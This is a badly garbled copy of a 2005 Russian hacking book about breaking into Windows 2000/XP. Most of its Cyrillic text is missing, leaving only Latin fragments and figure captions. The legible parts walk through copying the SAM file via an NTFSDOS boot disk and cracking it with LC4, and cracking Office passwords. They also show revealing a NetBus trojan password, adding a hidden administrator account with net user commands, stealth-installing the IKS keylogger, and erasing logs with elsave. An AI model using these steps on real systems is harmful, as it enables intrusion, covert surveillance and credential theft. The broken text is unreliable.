
Alex Atsctoy

004.056.53(075.8)
32.973.202-0878-1+32.973.2-018.278-1

Alex Atsctoy.
: . . .: [, ] /
Alex Atsctoy. .: , 2005. 192 .: .
ISBN 5-93673-036-0.
CIP

? ,
, - .

: www.3st.ru
E-mail: post@triumph.ru

ISBN 5-93673-036-0

, 2005
, 2005
, 2005


1.

2. Windows 2000/XP.

25

. "

37

4.

57

5. fyay^epofc Web

73

6.

83

7. Hacking ICQ

99

8. Web sites

115

9. DoS attacks

143

.
Windows 2000/XP

160

11.

176

191


1. .............................................................................................. 8
............................................... . .................................................. 9
- ? ................................................................................................... 10
............................................................................................... 13
................................................................................................ 16
....................................................................................................... 16
................................................................................. 17
............................................................................. 75
Web ........................................................................................................... 19
Web ............................................................................................................ 20
................................................................................................................ 21
............................................................................................. 21
................................................................ 22
- ....................................................................................................... 22
................................................................................................................. 23
................................................................................................................. 23

2. Windows 2000/XP .............................................. 25


........................................................................................................ 25
............................................................................................................... 26
........................................................................................................................... 27
Windows 2000/XP ................................................................... 28
SAM .............................................................................................................................. 29
............................................................................................... 30
.............................................................................................................. 31
Windows 2000 ................................................................................ 33
................................................................................................................. 35
................................................................................................................. 36

.&.................................................?
................................................................................. 38
NTFSDOS Pro ...................................................................................................... 39
SAM .................................................................................................................. 44
.................................................................................... 47
******** ............................................................................................. 50
......................................................................................... 51
............................................................................................. 52
......................................................................................................... 53
....................................................................................................... 53

................................................................................................
.. 56

4.

57

58
59
63
66
68
69
70
72

5. & Web
HTML
Web-

73
74
78
81
82

6.

83

83
85
88
89
90
91
96
97

7. ICQ

99


ICQ

IP- ICQ-
ICQ-
ICQ
ICQ-

100
101
102
103
104
106
111
112
113

8. Web sites

115

Web-
Web-
Web-


IIS 5


Web- Teleport Pro


HTML
Web

115
116
118
119
120
122
123
125
131
132
136
138
139
142

9. Attacks

143

DoS

!8
Smurf.


Nuke
Teardrop
Ping of Death
Land

DoS

144
145
145
147
148
149
151
752
154
154
755
155
756
159

10. Windows 2/.

TCP/IP

.


6

160
162
762
165
765



NetBus

168
169
173
175

176


PhoneSweep 4.4
PhoneSweep 4.4



PhoneSweep

177
178
179
180
782
185
186
186
190

1.

, - ,
, , , . , , . ,
( ).
!!!
, , .. , , 2 () .
.
,
:
log:
:
1:
2:
em: e-mail
.
,
! . 13.06.1999, ..
.
!!!
,
http://www.super-internet-provider.ru
, .
, - , , , , , , , . , , ,

Web- .


-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.


, , , ,
. , , , . ( !),
.
-
(-, !)
,
, .
, ,
-


,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,

.
, . , , , , , ,

, .
, , ,
. , - ,
, ,
, .
20-
- .

?
, , , , ,
, - , -
, ,
(, -
)
, -

10


. , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .
,
, .
, Windows ? ,
, - ? , , , ,
.

11


, ?
21 ( ).
:
:

, , ,
, ,
. , .
:

, .

. , , ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?
, - .
, , , , , ...
. , ,
, (, ,
) . , :
12


- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, . - , - 19- . ,
,
, , .
,
, , .
, , -, , .
, , , . - , , , . ,
. , ,
- , - .
.
, , , . , .
, , .


, ,
.. , .
, , . , -

13


,
, , .
, ,
,
,
. , , : - .

,
. ,
, , , , ,
[3].
, , , . ,
.

"
, , , , .
- - , .
- , , , . ,
, ,
.

14


, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 4,
, , , , Windows, , .
. IP-,

. -
. , - ,
, -,
- ,
.
, 4 -

, ,
.

15



- ,
- . -
, ,
. ,
DoS ,
IDS.

. , .


, - , , .
, ,
.
,
.
; , .
- ,
, , , , .
, , , . , [3] , . ,
, [3] !
[1]. , (
). ,

16


, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .


. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - ,
.

17


, , Teleport Pro.
, Web-
, .
, , HTML Web-
- ,
, HTTP .
, , , , ,
, , , ( 1 1 ).
, Web- - ,
, . , .


, ,
,
. .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
3 ,
, LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,
3 . Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
Revelation SnadBoy
(http://www.snadboy.com). , 18


***** - ,
, -
Revelation .
,
, , , ,
, .
.
-
?
, ,
- , - .

Web
- . , Web-,
,

-.
, Web, Web-,
Web- ,
. Web- 5 .

,
. , Web-,

.
. , , 6 Death & Destruction Email Bomber -
. , . , , , 6
Brutus.
19


, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, .
- , IP- ICQ- ICQ,
, .
, .

Web
Web- , , , DoS, - .
, IIS 5 (Internet Information Server - ) Microsoft
.
Web- , Web-, HTML . 8 , , CGIScan
Brutus, IIS
. 9 ,
DoS.
Web- ,
,
Web-. , DoS
, - , .
Web , , CGI-. ,

, .

20


TCP/IP , ,
, , IP-,
, .
,
.
10 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
,
, , .

Interception

, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
.
- SpyNet, .

21


, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .


, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .

, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.

11~
- ,
, .. . Web- ,
(., ,
http://www.securitylab.ru). 8 IIS. CGIScan
, . , 22


- , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .


- , .
- ,
. 10
NetBUS, . , .
- ,
, , .
. - , ,
. , , -
- , ,
... , , .

-
, , , ,
. ,
,
( ), ,
? , , -

23


,
, ?
, - ?
, , ( ),
, , , -
.
,
.

. ,
, ,
, .
, ,
.
, ,
,
, .... , , - Windows 2000/XP.

24

2.

Windows 2000/XP
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .
.
.

.
, - ,
, ,
, , .. ,
- .

, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM
, , . SAM - , 3 .
, .
,
, , .
, -


, , . , , ,
.., , , ,
. , ,
-, (,
, ) ,
, , .
, , , , .
Windows NT 4 NTLM
(NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM, , LM (LAN Manager - ),
, Windows NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .

, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.

26

Windows 2000/XP
, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...

urn
,
, .
, , - , .. ,
. ,
, . ,
,
, , ,
.
Windows NT/2000/XP,
, , - .
, 4, ,
, .
,
, , , ,

27


, , .
,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.

Windows 2000/XP
Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , :
, ,
28

, /, .
SAM AD ,
LSA . , , , ..
, SRM.
, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.

SAM
, , , ,
. , , , SAM AD,
. SAM %%\5132\\5,
AD - %root_directory%\ntds\ntds.dit. , , ,
- ! .
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstake.com) ,
.
LOphtCrack SAM, , , pwdump
(http://www.atstake.com). Windows - pwdump SAM
, LOphtCrack,
- ,
LM - .
29


Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .


Windows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
. Windows 2000/XP SID, Windows 2000 SID.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL

30

, , (Explorer) Windows,
Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID 8 , .
, ,
SRM 8 ACL , , .
, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.


Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .

31


ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .
Windows 2000/XP
, . , .
Windows 2000 , - ,
Windows 2000 Windows NT. , , .
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com*!.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1.
domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2
compl.domen2.forest, comp2.domen2.forest, ....
.

32

, - ,
:
.
(Universal group), , , .
(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOphtCrack .
, , - - .

Windows 2000
Windows 2000
, . - ,
33


, -, ,
. -, , , [7], , . -
, ,
- ,
. .
- ,
- , AD. - - ,
- -.
- ,
.

. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
34

-
TCP- 88 , Kerberos,
. -
LM NTLM, LOphtCrack
.
, - ,

. , ?

, , ,
.
, ,
.
,
. , , ,
.

,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP

Windows.

Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].

35


-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
, - ,
, .
- , ..
.


Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS ,
Microsoft Press Windows 2000.

36

&
Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
,
.
, , ,


(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .


,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),

Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .

38

NTFSDOS Pro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start Programs NTFSDOS Professional). (. 3.1).

[Fig. 3.1: NTFSDOS Professional Boot Disk Wizard welcome screen: "...wizard will help you install Windows NT/2000/XP system files needed for NTFSDOS Professional to run from a MS-DOS diskette or hard disk."]

Fig. 3.1. NTFSDOS Pro


> Next (). (. 3.2),
, .
> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 3.3) .

39

[Fig. 3.2: NTFSDOS Professional Boot Disk Wizard, second screen]
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/2000/XP installation or CD-ROM to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.
Buttons: < Back, Next >, Cancel.

Fig. 3.2.

[Fig. 3.3: NTFSDOS Professional Boot Disk Wizard, character set selection]
NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default. Select any additional character sets you use with DOS:
Japan, code page 932; Korean (Johab), code page 1361; Korean, code page 949; MS-DOS Canadian-French, code page 863; MS-DOS Icelandic, code page 861; MS-DOS Multilingual (Latin 1), code page 850; MS-DOS Nordic, code page 865; MS-DOS Portuguese, code page 860; MS-DOS Slavic (Latin II), code page 852.
Buttons: < Back, Next >, Cancel.

Fig. 3.3.
> Next ().
NTFSDOS Pro
(. 3.4).
Windows
NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 3.5).
40

[Fig. 3.4: NTFSDOS Professional Boot Disk Wizard, Windows installation directory]
NTFSDOS Pro uses copies of several files located in your Windows NT/2000/XP system directory. Specify the name of your Windows NT/2000/XP installation directory, or a directory containing the required Windows NT/2000 system files.
Buttons: < Back, Next >, Cancel.

Fig. 3.4. Windows

[Fig. 3.5: NTFSDOS Professional Boot Disk Wizard, target location]
The target location is the directory from which you will run NTFSDOS Pro. It must be accessible from MS-DOS. Specify the disk or directory from which you would like to run NTFSDOS Professional. You may select A: to specify a floppy disk.
Buttons: < Back, Next >, Cancel.

Fig. 3.5. NTFSDOS Pro


NTFSDOS Pro. MS-DOS,
.. FAT FAT32. :
. Advanced () NTFSDOS Pro , MS-DOS.
> Next ().
NTFSDOS Pro (. 3.6).

41

[Fig. 3.6: NTFSDOS Professional Boot Disk Wizard, copy files screen: "...floppy labelled NTFSDOS Professional 0. Press Next to copy files to A:\"]
Buttons: < Back, Next >, Cancel.

Fig. 3.6. NTFSDOS Pro


> Next (),
(. 3.7).

[Fig. 3.7: NTFSDOS Professional Boot Disk Wizard: "Copying files to diskette..."; Cancel]

Fig. 3.7.

(. 3.7) Next
() . Windows XP NTFSPRO.EXE
, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.

42


(. 3.8)
NTFSDOS Professional.

[Fig. 3.8: NTFSDOS Professional Boot Disk Wizard, final screen: "The necessary files have been copied. You may now reboot to MS-DOS and begin using NTFSDOS Professional Edition."]

Fig. 3.8. NTFSDOS Pro


> Finish (),
.
NTFSDOS Pro,
. NTFSDOS
Pro . ,
, NTFSPRO.EXE, NTFS . ,
, MS-DOS ,
FAT FAT32,
NTFSDOS Pro .
MS-DOS NTFS,
Windows 2000/XP . ,
( - ), , , . , -
, , , . ,
,
, .

- SAM,
, , _/132/1'|.

43

5
SAM, SAM.
NTFSDOS Pro, MS-DOS SAM /<system_root>/system32/config .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 3.9 LC4 Import ().

[Fig. 3.9: LC4 main window with the Import menu open (menus: File, View, Import, Session, Help)]
Import menu items: Import From Local Machine; Import From Remote Registry...; Import From SAM File...; Import From Sniffer...; Import From .LC File...; Import From .LCS (LC3) File...; Import From PWDUMP File...
Status bar: "Use the Import menu to retrieve accounts to audit."

Fig. 3.9. LC4
, LC4
, . SAM :
> File * New Session ( * ). , . 3.9.
> Import Import From SAM File ( *
SAM). SAM.
> SAM, 1-3.
> (. 3.10) Session Begin Audit
( ) .
44


[Fig. 3.10: @stake LC4 - (Untitled) session window after importing the SAM file (menus: File, View, Import, Session, Help). Accounts listed for domain ALEX-3: Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3, NewUser, with the password column reading "empty"; elapsed time 0d 0h 0m 0s; status bar: "Imported 7 accounts"]

Fig. 3.10. SAM


, , SAM, . , . 3.11, SAM.

[Fig. 3.11: LC4 audit results for the imported accounts: Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX-3, IWAM_ALEX-3, NewUser]

Fig. 3.11. SAM !
, - 007 , , .
, , 5
Pentium 2 400 . 45


- , LC4
.
LC4 Auditing
Options For This Session ( ), . 3.12.
[Fig. 3.12: LC4 "Auditing Options For This Session" dialog]
Dictionary Crack (Enabled; Dictionary List): "The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords."
Dictionary/Brute Hybrid Crack (Enabled; Characters to prepend: 0; Characters to append; Common letter substitutions (much slower)): "The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and finds weak passwords."
Brute Force Crack (Enabled; Character Set: A-Z and 0-9; Distributed; Custom Character Set (List each character)): "The Brute Force Crack tests for passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" or "vC569t12b". This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords."
Buttons: OK, Cancel.

Fig. 3.12.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack (/ ),
, / ,
, .
Password???, .

46


Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.

'
Windows , , . MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5.
, , *******

Revelation SnadBoy (http://www.snadboy.com).

, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - OfficePassword
.

47

OfficePassword 3.5
OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5

.
Word
password.doc, -
?
, Windows,
password.doc, (. 3.13).
- ,
OfficePassword 3.5
:
> OfficePassword (Start
Programs * OfficePassword). OfficePassword (. . 3.14).

[Fig. 3.13: Word "Password" dialog: "Enter password to open file C:\test\password.doc"; OK, Cancel]

Fig. 3.13. Word

[Fig. 3.14: OfficePassword "DEMO" main window (menus: File, Tools, Options, Help); "Select document" button; "You can also drag-and-drop files from Internet Explorer onto this window."; "(c) 1998-2001 Vitas Ramanchauskas, LastBit Software, http://lastbit.com"; "DEMO Version - Register to upgrade to a full-functional version!"]

Fig. 3.14.
OfficePassword

> Select document ( )


Windows MS Office.
, Word . ,
MS Word . ,
- OfficePassword 3- .
48


- , .
> , Select recovery
mode ( ), . 3.15.
[Fig. 3.15: OfficePassword "Select recovery mode" dialog]
Document path: C:\test\password.doc (Word); Version: Word 8.0+; Internal version: 133; Word language: Russian (0419); Encryption type: Strong; Text size: 537; Preview.
Automatic: "OfficePassword automatically selects the most suitable recovery options. Recovery may take a lot of time (up to several months in case of a long password). About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise."
User-defined: "Adjust settings to optimize search for a specific case. (This option is for advanced users only.)"
Guaranteed recovery: "Success is guaranteed! Important: please read the documentation. Additional fee may apply. Click here to learn..."
Buttons: Cancel; Display help info; Next.

Fig. 3.15.
> Select recovery mode ( )
:
Automatic ( ), ,
Next (), ,
.
User-defined ( ),
. .
Guaranteed recovery ( ), , , ,
.
> Next

[Fig. 3.16: OfficePassword "DEMO" result dialog: "Password found: '007' (without quotes). The password has been copied onto the clipboard. Would you like to open the document now?"; Yes, No]

Fig. 3.16. !
49


(). , ,
(. 3.16).
OfficePassword 3.5 , ,
. - , .
, - ,
.
, , 24-28
, . ,
, .
, , - ,
.

******
, - ,
, (, ), , ******.
, , , . - , , ,
. ,
.
,
-,
. ,
,
NetBus . . 3.17
Revelation Snad (http://www.snadboy.com) NetBus
NetBus.

50

[Fig. 3.17: SnadBoy's Revelation window placed over the NetBus connection dialog for host SWORD-2000]
SnadBoy's Revelation: 'Circled +' Cursor - "Drag to reveal password"; buttons: Check For Update, About, Exit, Copy to clipboard.
Text of Window Under 'Circled +' Cursor (if available): 007
Status: Revelation active. Length of available text: 3
Options: Reposition Revelation out of the way when dragging 'circled +'; When minimized, put in System Tray; Always on top; Hide 'How to' instructions.
How to:
1) Left click and drag (while holding down the left mouse button) the 'circled +' cursor.
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the 'Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks.
NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check the status light for availability of text. Bright green - text available (see 'Length of text:' in Status area); Bright red - no text available.
NetBus dialog (SWORD-2000): Change Host; Host information - Destination: SWORD-2000; Host name/IP; TCP-port; User name: Administrator; Password: (hidden); Cancel.

Fig. 3.17. NetBus Sword-2000


!
Revelation .
'Circled+'Cursor ('+')
SnadBoy's Revelation ( . 3.17 Password ()). Revelation,
Test of Window Under Circles and Cursor (if available) (
( )) (
). . 3.17, 007 NetBus Sword-2000,
( ).

( NetBus) [11].


- , - , -
, , - .
: .
51


, 4.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.

&*
, , , , .
MS-DOS: NET USER <username> <password> /ADD,
, , NET
LOCALGROUP <group name> <username> /ADD, . Fig. 3.18 .
[Fig. 3.18: Command Prompt]
C:\>net user NewUser 00 /add
The command completed successfully.
C:\>net localgroup Administrators NewUser /add
The command completed successfully.

Fig. 3.18.
NewUser
NewUser
, , .
,
,
.

52


- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.


- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 , .
Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS
Windows NT/2000/XP. , IKS , .
IKS .
Web- iks2k20d.exe , . 3.19.

53


[Fig. 3.19: IKS installer (iksinstall.exe) with the tabs Standard Install, Stealth Install and Uninstall]
"It's recommended that you use Standard Install if this is your first time in using IKS. Just accept the defaults and click on "Install Now" button. Or you can click on "Read readme" to get familiar with the concept of IKS first.
During a standard installation a program directory will be created; program files will be placed in the directory. An icon to the log file viewer will be placed on the desktop. No file renaming (stealth features) will take place.
Install Directory: C:\Program Files\iks
You need to have administrator rights on this system for it to install successfully.
If you want to uninstall in the future, just run this program (iksinstall.exe) again, click on the "Uninstall" tab, then "Uninstall Now" to automatically uninstall the standard installation."
Buttons: Read readme; Install Now.

Fig. 3.19. IKS
Install Now ( ) -
. IKS . ,
IKS , iks.sys,
. ,
dataview.exe, . 3.20.
[Fig. 3.20: IKS log viewer dataview.exe (menus: Settings, Help)]
Options: Filter Out Arrow Keys; Filter Out Ctrl and Alt Keys; Filter Out F1 to F12 Keys; Filter Out All Other Function Keys; Use Notepad; Translate to Text Only; Clear Binary Log Upon Exit; Clear Text Log Upon Exit.
Fields: Import Binary Log From; Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS... ; Browse.

Fig. 3.20.

54


Go! () , . . 3.20 ,
, .
, IKS , . iks.sys <system_root>/system32/drivers,
( Regedt32 . 3.21).
[Fig. 3.21: Registry Editor (Regedt32), HKEY_LOCAL_MACHINE on Local Machine (menus: Registry, Edit, Tree, View, Security, Options, Window, Help); the Services subtree with the IKS driver entry selected]
Start: REG_DWORD: 0x3
Type: REG_DWORD: 0x1

Fig. 3.21. Windows



(,
The Cleaner, ).
IKS, Stealth Install
( ) (. 3.19)
- , calc.sys,
(, -
- ).
IKS
. 007 Stealth
Monitor, Web-, , ,
. -
Windows,
- , , notepad.exe.

55


, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.
- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , , - ?
. .

56

4.


- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 , 50%
,
- , , .

, ,
,
. , ,- , , . ,
( ).

, - ( ).
,

. , - , , , .
.


, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
, [10],
(, ) , - , - privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .

. , Web-
, Web, .
, , ,

58


(, ).


, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .


. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
59


(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
[Fig. 4.1: Folder Options dialog (View tab) with the "Show hidden files and folders" option; OK]

Fig. 4.1.
- Word
(Delete) Windows ,
. . 4.2,
, Word,
, ,
.


[Fig. 4.2: Windows Explorer showing the folders PGP, Security, Database and the hidden temporary files left behind by Word: a ~$...doc lock file and ~WRL0002.tmp, ~WRL1120.tmp, ~WRL3531.tmp and other ~WRL*.tmp files]

Fig. 4.2. ,

, - ., .WBK, 60


, ~$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.
- Cleaner Disk Security
(http://www.theabsolute.net/sware/index.html#Clndisk).


,
, , . , . ,
, . - , , .
( 100%) .
. 4.3 Clean Disk Security 5.01
(http://www.the-absolute.net/sware/
index.html#Clndisk), ,


( ).
Clean Disk Security 5.01

Erase
fully ( ).

, , - . 4.3. Clean Disk Security 5.01



(
61


FAT NTFS). , , .
Windows, Windows,
Temp ( , , )
. -,
, ,
(cookie).
, (. 4.3).
. 4.3, :
Simple () - 6 ,
. ; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . . ,
( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01

, , .
, [10]. -
, : (UPS);
. , ,
.
,
.

62


, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.

. , ,
NTFS.


, ,
, -
. , - - Web- .
, , .
.
, ,
.

&
, , .
. ,
.

63



, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
, , !!!

Web- ,
64


. HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 4.4, , Web-, - .
[Fig. 4.4: "Analyze Your Internet Privacy - Microsoft Internet Explorer" (http://www.privacy.net/analyze)]
Your Browser Type and Operating System:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All information sent by your web browser when requesting this web page:
Accept: */*
Accept-Language: ru
Connection: keep-alive
Host: www.privacy.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
Cookie: Date=1/30/2002; Privacy.net=Privacy+Analysis
Via: 1.1 cea15, 1.1 proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3)
X-Forwarded-For: 212.9.232.151, 212.9.224.89
Cache-Control: max-age=259200

Fig. 4.4. Web-
, ( )
Whols,
1,
.
, - , IP- . Web-
Web- , IP- -
...

65

, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 4.5).
[Fig. 4.5: "Anonymizer.com -- Online Privacy Service" home page (http://www.anonymizer.com) in Internet Explorer, with the About Privacy, Find It and SpyCap sections]

Fig. 4.5. Web-
Go.

- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .

Web -, - (Proxy server)


(. 4.6).

66

[Fig. 4.6: Internet Explorer proxy server settings dialog: proxy address field starting with "www.anonymize", port 8080; option to use the same proxy for all protocols; per-protocol address and port fields; OK, Cancel]

Fig. 4.6. -
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .

67


, , , ,
, , , .
, , , 3 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
IP- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, , , .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).

Windows, .
, .
,
68


, , explorer.exe,
Windows
Windows.

, EliteWrap, [11].

